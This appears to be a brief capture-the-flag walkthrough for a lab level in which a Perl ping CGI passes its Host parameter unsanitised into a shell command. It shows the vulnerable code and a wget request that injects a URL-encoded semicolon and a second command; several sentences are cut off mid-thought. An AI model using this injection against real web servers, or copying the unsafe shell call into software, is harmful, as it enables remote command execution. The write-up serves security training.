The flag07 user was writing their very first perl program that allowed them to ping hosts to see if they were reachable from the web server.
To do this level, log in as the level07 account with the password level07. Files for this level can be found in /home/flag07.
$host = $_; print("<html><head><title>Ping results</title></head><body><pre>"); @output = `ping -c 3 $host 2>&1`;
The program allows command injection via
Lets set it to
But how do we run it?
There is a thttpd.conf in that directory, can we use it?
In that file we can see:
curl is not installed on that system so I’ll use
wget -O - "http://localhost:7007/index.cgi?Host=%3Bgetflag"
%3B is the url encoded version of
However if for some reason thttpd isn’t running on port
7007 try rebooting the system.
You have successfully executed getflag on a target account.